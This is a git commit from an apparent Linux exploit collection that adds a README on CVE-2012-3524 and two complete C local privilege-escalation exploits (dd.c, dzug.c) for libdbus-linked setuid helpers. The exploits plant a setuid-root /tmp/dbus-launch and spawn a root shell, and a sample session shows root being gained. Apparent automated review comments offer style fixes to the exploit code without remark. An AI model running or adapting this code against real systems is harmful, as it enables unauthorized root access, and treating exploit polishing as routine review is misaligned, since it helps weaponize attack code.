

Commit c7ba9eb

committed
linux-exp
1 parent 80ec5dd commit c7ba9eb


5 files changed

+253
-0
lines changed


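--- a/2012/CVE-2012-3524/README.md
+++ b/2012/CVE-2012-3524/README.md
@@ -0,0 +1,23 @@
+# CVE-2012-3524
+```
+libdbus 1.5.x and earlier,
+when used in setuid or other privileged programs in X.org and possibly other products,
+allows local users to gain privileges and execute arbitrary code via the DBUS_SYSTEM_BUS_ADDRESS environment variable.
+NOTE: libdbus maintainers state that this is a vulnerability in the applications that do not cleanse environment variables,
+not in libdbus itself: "we do not support use of libdbus in setuid binaries that do not sanitize their environment before their first call into libdbus."
+```
+
+
+Vulnerability reference:
+* [CVE-2012-3524](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3524)
+* [exp-db](https://www.exploit-db.com/exploits/21323/)
+
+## libdbus
+```
+1.5.x and earlier
+```
+
+
+
+
+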

2012/CVE-2012-3524/dd

9.8 KB
Binary file not shown.

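--- a/2012/CVE-2012-3524/dd.c
+++ b/2012/CVE-2012-3524/dd.c
@@ -0,0 +1,115 @@
+/* CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
+*
+* edited by Pashkela for RDOT.ORG (23.01.2013)
+*
+* su auto vector (need tty + current user password)
+*
+* Trivial non-dbus root exploit. (Yes, it is 2012!)
+*
+* The underlying bug (insecure getenv() by default) has been
+* reported ages ago, but nobody really cared. Unless you have an
+* exploit...
+* ==============================================================
+* Ubuntu 9.04
+*
+* an@an-desktop:~$ uname -a
+* Linux an-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
+* an@an-desktop:~$ gcc s.c -o s
+* an@an-desktop:~$ id
+* uid=1000(an) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
+* an@an-desktop:~$ ./s
+* [**] CVE-2012-3524 xSports -- this is not a dbus exploit!
+*
+*[*] Preparing ...
+*[+] Type current user passwd when asked
+*[*] Waiting 10s for dbus-launch to drop boomshell.
+* Password: .......
+* bash: [+] GOT root!: No such file or directory
+* ...
+* [!] Hurra!
+* bash-3.2# id
+* uid=0(root) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
+* bash-3.2#
+* ==============================================================
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/signal.h>
+#include <sys/stat.h>
+
+
+int main(int argc, char **argv)
+{
+int i = 0;
+struct stat st;
+pid_t pid = 0;
+char *env[] = {
+"PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
+"DBUS_STARTER_BUS_TYPE=system",
+"DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
+NULL,
+NULL
+};
+
+
+char *su[] = {"/bin/su",NULL,"[+] GOT root!", NULL};
+
+char **a = su;
+char *dbus[] = {"/tmp/dbus-launch", NULL};
+char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
+char me[0x1000];
+
+if (geteuid() == 0 && argc > 1) {
+chown("/tmp/dbus-launch", 0, 0);
+chmod("/tmp/dbus-launch", 04755);
+exit(errno);
+} else if (geteuid() == 0) {
+setuid(0);
+execve(*sh, sh, NULL);
+return errno;
+}
+
+printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
+memset(me, 0, sizeof(me));
+
+if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
+/* Solaris */
+readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
+}
+symlink(me, "/tmp/dbus-launch");
+printf("[+] Type current user passwd when asked\n");
+env[3] = "DISPLAY=:7350";
+su[1] = getenv("USER");
+a = su;
+
+if ((pid = fork()) == 0) {
+execve(*a, a, env);
+exit(0);
+}
+
+printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
+
+for (i = 0; i < 10; ++i) {
+sleep(1);
+printf("."); fflush(stdout);
+}
+kill(pid, SIGKILL);
+waitpid(pid, NULL, 0);
+
+for (;;) {
+stat(*dbus, &st);
+if ((st.st_mode & 04755) == 04755)
+break;
+sleep(1);
+}
+printf("\n[!] Hurra!\n");
+
+execve(*dbus, dbus, NULL);
+return errno;
+}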
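Review bot: The header comment of dd.c does not document the persistent filesystem state main() leaves behind: `symlink(me, "/tmp/dbus-launch")` is created unconditionally before anything else is checked, and the `geteuid() == 0 && argc > 1` branch turns that path into a root-owned mode 04755 file via `chown`/`chmod`, while no code path ever unlinks it. A header line such as `/* NOTE: creates /tmp/dbus-launch (symlink to this binary); on success it is left as a setuid-root file and must be removed by hand after testing. */` would make the side effect visible to whoever runs or audits this file, and the same note applies verbatim to dzug.c in this commit. The `argv` parameter is also unused (only `argc` is read), so `(void)argv;` or renaming it would quiet `-Wunused-parameter`.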

2012/CVE-2012-3524/dzug

10.5 KB
Binary file not shown.

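--- a/2012/CVE-2012-3524/dzug.c
+++ b/2012/CVE-2012-3524/dzug.c
@@ -0,0 +1,115 @@
+/* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
+*
+* Trivial non-dbus root exploit. (Yes, it is 2012!)
+*
+* The underlying bug (insecure getenv() by default) has been
+* reported ages ago, but nobody really cared. Unless you have an
+* exploit...
+*
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/signal.h>
+#include <sys/stat.h>
+
+
+int main(int argc, char **argv)
+{
+int i = 0;
+struct stat st;
+pid_t pid = 0;
+char *env[] = {
+"PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
+"DBUS_STARTER_BUS_TYPE=system",
+"DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
+NULL,
+NULL
+};
+
+
+/* the pam_systemd vector */
+char *su[] = {"/bin/su", NULL, "blah", NULL};
+
+/* the spice vector */
+char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL};
+
+/* the Xorg vector, for older Linux dists and Solaris */
+char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL};
+
+char **a = xorg;
+char *dbus[] = {"/tmp/dbus-launch", NULL};
+char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
+char me[0x1000];
+
+if (geteuid() == 0 && argc > 1) {
+chown("/tmp/dbus-launch", 0, 0);
+chmod("/tmp/dbus-launch", 04755);
+exit(errno);
+} else if (geteuid() == 0) {
+setuid(0);
+execve(*sh, sh, NULL);
+return errno;
+}
+
+printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
+memset(me, 0, sizeof(me));
+
+if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
+/* Solaris */
+readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
+}
+symlink(me, "/tmp/dbus-launch");
+
+if (stat(spice[0], &st) == 0) {
+if ((st.st_mode & 04000) == 04000) {
+printf("[+] Using spice helper ...\n");
+a = spice;
+}
+} else if (stat("/lib64/security/pam_systemd.so", &st) == 0) {
+printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n");
+env[3] = "DISPLAY=:7350";
+su[1] = getenv("USER");
+a = su;
+} else if (stat(xorg[0], &st) == 0) {
+if ((st.st_mode & 04000) == 04000)
+printf("[+] Using Xorg helper ...\n");
+else {
+printf("[-] No suitable suid helper found.\n");
+exit(0);
+}
+} else {
+printf("[-] No suitable suid helper found.\n");
+exit(0);
+}
+
+if ((pid = fork()) == 0) {
+execve(*a, a, env);
+exit(0);
+}
+
+printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
+
+for (i = 0; i < 10; ++i) {
+sleep(1);
+printf("."); fflush(stdout);
+}
+kill(pid, SIGKILL);
+waitpid(pid, NULL, 0);
+
+for (;;) {
+stat(*dbus, &st);
+if ((st.st_mode & 04755) == 04755)
+break;
+sleep(1);
+}
+printf("\n[!] Hurra!\n");
+
+execve(*dbus, dbus, NULL);
+return errno;
+}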
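Review bot: The path literal `"/tmp/dbus-launch"` is spelled out four times in main() — in `dbus[]`, `chown`, `chmod` and `symlink` — so a future edit to one site silently desynchronises the others; the three calls should go through the array that already names it, e.g. `chown(dbus[0], 0, 0);`, `chmod(dbus[0], 04755);` and `symlink(me, dbus[0]);`. dd.c in the same commit has the identical duplication. The `if ((st.st_mode & 04000) == 04000)` in the Xorg branch also lacks the braces the spice branch uses for the same shape of check, which is worth aligning for readability.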
